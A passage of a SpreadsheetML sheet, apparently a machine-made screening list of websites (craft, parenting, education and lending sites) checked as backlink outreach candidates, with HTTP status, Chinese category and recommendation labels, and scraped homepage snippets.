      </x:c>
      <x:c r="E221" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F221" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G221" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H221" s="19" t="str">
        <x:v>https://rgsoftwares.com/</x:v>
      </x:c>
      <x:c r="I221" s="19" t="str">
        <x:v>School Management System - Free Mobile App and Web Portal</x:v>
      </x:c>
      <x:c r="J221" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K221" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L221" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M221" s="19" t="str">
        <x:v>https://rgsoftwares.com/</x:v>
      </x:c>
      <x:c r="N221" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O221" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P221" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q221" s="21" t="str">
        <x:v>The SMS – School Management System – This is highly professional software designed to meet the ever-growing needs of any school and college. The Software.. School Management System - Free Mobile App and Web Portal Skip to content Home Products + School Management Software Inventory with POS system Billing Book Software With Advanced POS Hotel &amp; Restaurant Management Academy Management System Services + Custom Software Development Web Design &amp; Development Website Maintenance &amp; Management Mobile Application Development Digital Marketing Web Hosting &amp; Servers Students Notes About Us + Contact Portfolio Team Blog Features Price Download Clients 03008368077, 0 3027283939 Home Products + School Management Software Inventory with POS system Billing Book Software With Advanced POS Hotel &amp; Restaurant Management Academy Management System Services + Custo</x:v>
      </x:c>
      <x:c r="R221" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S221" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T221" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://rgsoftwares.com</x:v>
      </x:c>
    </x:row>
    <x:row r="222">
      <x:c r="A222" s="18" t="str">
        <x:v>221</x:v>
      </x:c>
      <x:c r="B222" s="19" t="str">
        <x:v>diyncrafty.com</x:v>
      </x:c>
      <x:c r="C222" s="19" t="str">
        <x:v>https://diyncrafty.com</x:v>
      </x:c>
      <x:c r="D222" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E222" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F222" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G222" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H222" s="19" t="str">
        <x:v>https://www.diyncrafty.com/</x:v>
      </x:c>
      <x:c r="I222" s="19" t="str">
        <x:v>DIY Crafts - Find Your Next DIY &amp; Crafts And Projects</x:v>
      </x:c>
      <x:c r="J222" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K222" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L222" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M222" s="19" t="str">
        <x:v>https://www.diyncrafty.com/</x:v>
      </x:c>
      <x:c r="N222" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O222" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P222" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q222" s="21" t="str">
        <x:v>Find easy DIY crafts, kids crafts, DIY crafty ideas, DIY home decor, Fashion, Free crochet patterns, and much more from the crafting experts. DIY Crafts - Find Your Next DIY &amp; Crafts And Projects Skip to Content Search Search for: Close Search &amp;times; Drawing Free Crochet Patterns DIY Projects DIY Gym Ideas Fun DIY Projects DIY For Aquarium Pallet Projects DIY Bedroom Projects DIY For Camping DIY For Bathroom DIY For Useful Living DIY Decor Pet's Living Ideas DIY Crafts DIY For Kids DIY Watercrafts DIY Sewing Projects Gardening If you have the talent to craft things but do not have the opportunity and ideas to bring them into shape, you are lucky to dig out many ideas from diyncrafty.com. The world presents various unique and exciting ideas for DIY crafts and DIY home d&amp;eacute;cor projects. Discover Pallet projects to build a very</x:v>
      </x:c>
      <x:c r="R222" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S222" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T222" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://diyncrafty.com</x:v>
      </x:c>
    </x:row>
    <x:row r="223">
      <x:c r="A223" s="18" t="str">
        <x:v>222</x:v>
      </x:c>
      <x:c r="B223" s="19" t="str">
        <x:v>tradeloan.com.au</x:v>
      </x:c>
      <x:c r="C223" s="19" t="str">
        <x:v>https://tradeloan.com.au</x:v>
      </x:c>
      <x:c r="D223" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E223" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F223" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G223" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H223" s="19" t="str">
        <x:v>https://www.tradeloan.com.au/</x:v>
      </x:c>
      <x:c r="I223" s="19" t="str">
        <x:v>| Trade Loan</x:v>
      </x:c>
      <x:c r="J223" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K223" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L223" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M223" s="19" t="str">
        <x:v>https://www.tradeloan.com.au/</x:v>
      </x:c>
      <x:c r="N223" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O223" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P223" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q223" s="21" t="str">
        <x:v>| Trade Loan Home Blog Flexible funding to suit your business needs Need funds for an opportunity or to support cash flow? Enjoy fast, easy application on a Small Business Loan or a Line of Credit , with funding possible in 24 hours. Get started Eligibility Business Loan - a lump sum of between $5K and $500K over a fixed term Line of Credit - ongoing access to between $2K and $150K over a renewable 24-month term Straightforward application, quick decision and funding possible in 24 hours There is no asset security required upfront to access funding up to $150,000 Business funding in three easy steps Step one Submit your details First we need a few details about you and your business. Select </x:v>
      </x:c>
      <x:c r="R223" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S223" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T223" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://tradeloan.com.au</x:v>
      </x:c>
    </x:row>
    <x:row r="224">
      <x:c r="A224" s="18" t="str">
        <x:v>223</x:v>
      </x:c>
      <x:c r="B224" s="19" t="str">
        <x:v>happytoddlerplaytime.com</x:v>
      </x:c>
      <x:c r="C224" s="19" t="str">
        <x:v>https://happytoddlerplaytime.com</x:v>
      </x:c>
      <x:c r="D224" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E224" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F224" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G224" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H224" s="19" t="str">
        <x:v>https://happytoddlerplaytime.com/</x:v>
      </x:c>
      <x:c r="I224" s="19" t="str">
        <x:v>Happy Toddler Playtime</x:v>
      </x:c>
      <x:c r="J224" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K224" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L224" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M224" s="19" t="str">
        <x:v>https://happytoddlerplaytime.com/</x:v>
      </x:c>
      <x:c r="N224" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O224" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P224" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q224" s="21" t="str">
        <x:v>Fun and easy learning activities, arts and crafts, and play ideas for babies, toddlers, preschoolers, kindergartners and beyond! Happy Toddler Playtime Skip to content GET OUR FREE EBOOK! Shop About Me Contact Home Activities Crafts Sensory Free Coloring Pages &amp; Printables Seasonal Holidays Learning Colors Fine Motor Skills Gross Motor Skills Letters Math STEM Age Baby Toddler Preschooler Kindergartner Big Kid Parenting Search Search Finder GET OUR FREE EBOOK! Search for: Search Crafts &amp; Activities for Kids Activities Crafts Sensory Parenting Printables Outdoors Science Math Fine Motor Literacy Explore All The Activities! Activities Coloring Pages Jokes for Kids Indoor Activities Outdoor Activities Rainy Day Activities Sensory Playdough Sensory Bins Slime Water Beads Age Baby Toddler Preschooler Kindergartner Big Kid </x:v>
      </x:c>
      <x:c r="R224" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S224" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T224" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://happytoddlerplaytime.com</x:v>
      </x:c>
    </x:row>
    <x:row r="225">
      <x:c r="A225" s="18" t="str">
        <x:v>224</x:v>
      </x:c>
      <x:c r="B225" s="19" t="str">
        <x:v>hivapcop.org</x:v>
      </x:c>
      <x:c r="C225" s="19" t="str">
        <x:v>https://hivapcop.org</x:v>
      </x:c>
      <x:c r="D225" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E225" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F225" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G225" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H225" s="19" t="str">
        <x:v>https://hivapcop.org/</x:v>
      </x:c>
      <x:c r="I225" s="19" t="str"/>
      <x:c r="J225" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K225" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L225" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M225" s="19" t="str">
        <x:v>https://hivapcop.org/</x:v>
      </x:c>
      <x:c r="N225" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O225" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P225" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q225" s="21" t="str"/>
      <x:c r="R225" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S225" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T225" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://hivapcop.org</x:v>
      </x:c>
    </x:row>
    <x:row r="226">
      <x:c r="A226" s="18" t="str">
        <x:v>225</x:v>
      </x:c>
      <x:c r="B226" s="19" t="str">
        <x:v>mamanista.com</x:v>
      </x:c>
      <x:c r="C226" s="19" t="str">
        <x:v>https://mamanista.com</x:v>
      </x:c>
      <x:c r="D226" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E226" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F226" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G226" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H226" s="19" t="str">
        <x:v>https://www.mamanista.com/</x:v>
      </x:c>
      <x:c r="I226" s="19" t="str">
        <x:v>Mamanista! - Fabulously Chic. Irresistably Practical.</x:v>
      </x:c>
      <x:c r="J226" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K226" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L226" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M226" s="19" t="str">
        <x:v>https://www.mamanista.com/</x:v>
      </x:c>
      <x:c r="N226" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O226" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P226" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q226" s="21" t="str">
        <x:v>Fabulously Chic. Irresistably Practical. Mamanista! - Fabulously Chic. Irresistably Practical. Mamanista! Fabulously Chic. Irresistably Practical. Menu Savvy Gifts Parenting Toys &amp; Games Home &amp; Food Crafts Food Learning Health &amp; Safety Entertainment Beauty &amp; Fashion Online Life Social Good Seasonal Search Search site Step Back in Time with The Queen’s Treasures Nellie Oleson Doll and Antique School Desk for 18-Inch Dolls In a world filled with high-tech toys and fast-paced play, sometimes it’s refreshing to find something that brings kids back to the basics of imaginative play. The Queen’s Treasures has done exactly that with their beautifully designed Little House … Read More Latest Posts Easy School Lunch Ideas For many families,</x:v>
      </x:c>
      <x:c r="R226" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S226" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T226" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://mamanista.com</x:v>
      </x:c>
    </x:row>
    <x:row r="227">
      <x:c r="A227" s="18" t="str">
        <x:v>226</x:v>
      </x:c>
      <x:c r="B227" s="19" t="str">
        <x:v>touchlinevideo.com</x:v>
      </x:c>
      <x:c r="C227" s="19" t="str">
        <x:v>https://touchlinevideo.com</x:v>
      </x:c>
      <x:c r="D227" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E227" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F227" s="20" t="str">
        <x:v>409</x:v>
      </x:c>
      <x:c r="G227" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H227" s="19" t="str">
        <x:v>http://touchlinevideo.com/</x:v>
      </x:c>
      <x:c r="I227" s="19" t="str">
        <x:v>DNS resolution error | touchlinevideo.com | Cloudflare</x:v>
      </x:c>
      <x:c r="J227" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K227" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L227" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M227" s="19" t="str">
        <x:v>http://touchlinevideo.com/</x:v>
      </x:c>
      <x:c r="N227" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O227" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P227" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q227" s="21" t="str">
        <x:v>DNS resolution error | touchlinevideo.com | Cloudflare Please enable cookies. Error 1001 Ray ID: a349b9860bc57e2f &amp;bull; 2026-09-02 04:20:52 UTC DNS resolution error What happened? You've requested a page on a website (touchlinevideo.com) that is on the Cloudflare network. Cloudflare is currently unable to resolve your requested domain (touchlinevideo.com). There are two potential causes of this: Most likely: if the owner just signed up for Cloudflare it can take a few minutes for the website's information to be distributed to our global network. Less likely: something is wrong with this site's configuration. Usually this happens when accounts have been signed up with a partner organization </x:v>
      </x:c>
      <x:c r="R227" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S227" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T227" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://touchlinevideo.com
http://touchlinevideo.com</x:v>
      </x:c>
    </x:row>
    <x:row r="228">
      <x:c r="A228" s="18" t="str">
        <x:v>227</x:v>
      </x:c>
      <x:c r="B228" s="19" t="str">
        <x:v>twinkl.co.ke</x:v>
      </x:c>
      <x:c r="C228" s="19" t="str">
        <x:v>https://twinkl.co.ke</x:v>
      </x:c>
      <x:c r="D228" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E228" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F228" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G228" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H228" s="19" t="str">
        <x:v>https://www.twinkl.co.ke/</x:v>
      </x:c>
      <x:c r="I228" s="19" t="str"/>
      <x:c r="J228" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K228" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L228" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M228" s="19" t="str">
        <x:v>https://www.twinkl.co.ke/</x:v>
      </x:c>
      <x:c r="N228" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O228" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P228" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q228" s="21" t="str"/>
      <x:c r="R228" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S228" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T228" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.co.ke</x:v>
      </x:c>
    </x:row>
    <x:row r="229">
      <x:c r="A229" s="18" t="str">
        <x:v>228</x:v>
      </x:c>
      <x:c r="B229" s="19" t="str">
        <x:v>twinkl.ie</x:v>
      </x:c>
      <x:c r="C229" s="19" t="str">
        <x:v>https://twinkl.ie</x:v>
      </x:c>
      <x:c r="D229" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E229" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F229" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G229" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H229" s="19" t="str">
        <x:v>https://www.twinkl.ie/</x:v>
      </x:c>
      <x:c r="I229" s="19" t="str"/>
      <x:c r="J229" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K229" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L229" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M229" s="19" t="str">
        <x:v>https://www.twinkl.ie/</x:v>
      </x:c>
      <x:c r="N229" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O229" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P229" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q229" s="21" t="str"/>
      <x:c r="R229" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S229" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T229" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.ie</x:v>
      </x:c>
    </x:row>
    <x:row r="230">
      <x:c r="A230" s="18" t="str">
        <x:v>229</x:v>
      </x:c>
      <x:c r="B230" s="19" t="str">
        <x:v>resolvefunding.com.au</x:v>
      </x:c>
      <x:c r="C230" s="19" t="str">
        <x:v>https://resolvefunding.com.au</x:v>
      </x:c>
      <x:c r="D230" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E230" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F230" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G230" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H230" s="19" t="str">
        <x:v>https://resolvefunding.com.au/</x:v>
      </x:c>
      <x:c r="I230" s="19" t="str">
        <x:v>Resolve Funding – Let Resolve, resolve it, today</x:v>
      </x:c>
      <x:c r="J230" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K230" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L230" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M230" s="19" t="str">
        <x:v>https://resolvefunding.com.au/</x:v>
      </x:c>
      <x:c r="N230" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O230" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P230" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q230" s="21" t="str">
        <x:v>Resolve Funding – Let Resolve, resolve it, today Skip to content Apply now or call 1800 978 654 About us How it works Unsecured loans Line of credit FAQ Blog Main Menu Looking for an unsecured business loan? Let Resolve, resolve it, today! Unsecured business loans from $5,000 to $500,000 Apply Now Applying won’t affect your credit score Terms 3 to 36 months Early payout options available Daily or weekly payments available No asset security required Available to registered ABN holders Fast decisions and funding possible in 24 hours About Us A passionate approach to business finance Looking for fast, affordable unsecured business finance, then look no further than Resolve. Our passion is finan</x:v>
      </x:c>
      <x:c r="R230" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S230" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T230" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://resolvefunding.com.au</x:v>
      </x:c>
    </x:row>
    <x:row r="231">
      <x:c r="A231" s="18" t="str">
        <x:v>230</x:v>
      </x:c>
      <x:c r="B231" s="19" t="str">
        <x:v>rainbowprintables.com</x:v>
      </x:c>
      <x:c r="C231" s="19" t="str">
        <x:v>https://rainbowprintables.com</x:v>
      </x:c>
      <x:c r="D231" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E231" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F231" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G231" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H231" s="19" t="str">
        <x:v>https://rainbowprintables.com/</x:v>
      </x:c>
      <x:c r="I231" s="19" t="str">
        <x:v>Rainbow Printables - How To Draw Tutorials | Kid Art Projects | Coloring Pages</x:v>
      </x:c>
      <x:c r="J231" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K231" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L231" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M231" s="19" t="str">
        <x:v>https://rainbowprintables.com/</x:v>
      </x:c>
      <x:c r="N231" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O231" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P231" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q231" s="21" t="str">
        <x:v>We innovate and create new ways for kids to learn, play, and create through art. 🌈 Rainbow Printables is the perfect solution to keep kids busy on rainy days while giving parents some quiet time. Print free coloring pages, how-to-draw art tutorials, and lots of cardboard craft ideas. 💌 Sign up for our free newsletter to get the latest content and offers. Rainbow Printables - How To Draw Tutorials | Kid Art Projects | Coloring Pages Skip to content Contact &amp; Copyrights Contact &amp; Copyrights Toggle header Toggle Navigation Home About Us Art Activities For Kids How To Draw Tutorials Free Coloring Pages for Kids Featured Posts 26 Pretty Fairy Kids Coloring Pages for Girls (Free!) A hunch of free fairy coloring pages for kids to print and color. Love beautiful fairies then you’ll love these free coloring sheets. by Lily P. - 0 Comments Free Dinosaur Pretend Masks (Tyrannosaurus Rex &amp; Stegosaurus) Printables for Kids Let your little dino-loving buddy roar like a dinosaur behind these big scary dino masks! Download and print out these free masks of </x:v>
      </x:c>
      <x:c r="R231" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S231" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T231" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://rainbowprintables.com</x:v>
      </x:c>
    </x:row>
    <x:row r="232">
      <x:c r="A232" s="18" t="str">
        <x:v>231</x:v>
      </x:c>
      <x:c r="B232" s="19" t="str">
        <x:v>theanswerpgh.com</x:v>
      </x:c>
      <x:c r="C232" s="19" t="str">
        <x:v>https://theanswerpgh.com</x:v>
      </x:c>
      <x:c r="D232" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E232" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F232" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G232" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H232" s="19" t="str">
        <x:v>https://theanswerpgh.com/</x:v>
      </x:c>
      <x:c r="I232" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J232" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K232" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L232" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M232" s="19" t="str">
        <x:v>https://theanswerpgh.com/</x:v>
      </x:c>
      <x:c r="N232" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O232" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P232" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q232" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access theanswerpgh.com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a349b986a94b293d &amp;bull; Your IP: Clic</x:v>
      </x:c>
      <x:c r="R232" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S232" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T232" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://theanswerpgh.com</x:v>
      </x:c>
    </x:row>
    <x:row r="233">
      <x:c r="A233" s="18" t="str">
        <x:v>232</x:v>
      </x:c>
      <x:c r="B233" s="19" t="str">
        <x:v>kiddipedia.com.au</x:v>
      </x:c>
      <x:c r="C233" s="19" t="str">
        <x:v>https://kiddipedia.com.au</x:v>
      </x:c>
      <x:c r="D233" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E233" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F233" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G233" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H233" s="19" t="str">
        <x:v>https://kiddipedia.com.au/</x:v>
      </x:c>
      <x:c r="I233" s="19" t="str">
        <x:v>Kiddipedia</x:v>
      </x:c>
      <x:c r="J233" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K233" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L233" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M233" s="19" t="str">
        <x:v>https://kiddipedia.com.au/</x:v>
      </x:c>
      <x:c r="N233" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O233" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P233" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q233" s="21" t="str">
        <x:v>Kiddipedia Parents rarely get much uninterrupted downtime, so the quiet hours after the kids are asleep often become a chance to browse, stream or explore online entertainment. Australian adults considering casino-style games can check independent feedback before choosing a platform. The PayID pokies Australia profile on Trustpilot provides another place to review shared experiences and make a more informed decision. Gambling should always remain an adult activity and be approached responsibly. For Australians weighing up online platforms before signing up, verified user reviews remain one of the most reliable sources of grounded information. Trustpilot collects feedback from real players co</x:v>
      </x:c>
      <x:c r="R233" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S233" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T233" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://kiddipedia.com.au</x:v>
      </x:c>
    </x:row>
    <x:row r="234">
      <x:c r="A234" s="18" t="str">
        <x:v>233</x:v>
      </x:c>
      <x:c r="B234" s="19" t="str">
        <x:v>dalfuayleq.org.sa</x:v>
      </x:c>
      <x:c r="C234" s="19" t="str">
        <x:v>https://dalfuayleq.org.sa</x:v>
      </x:c>
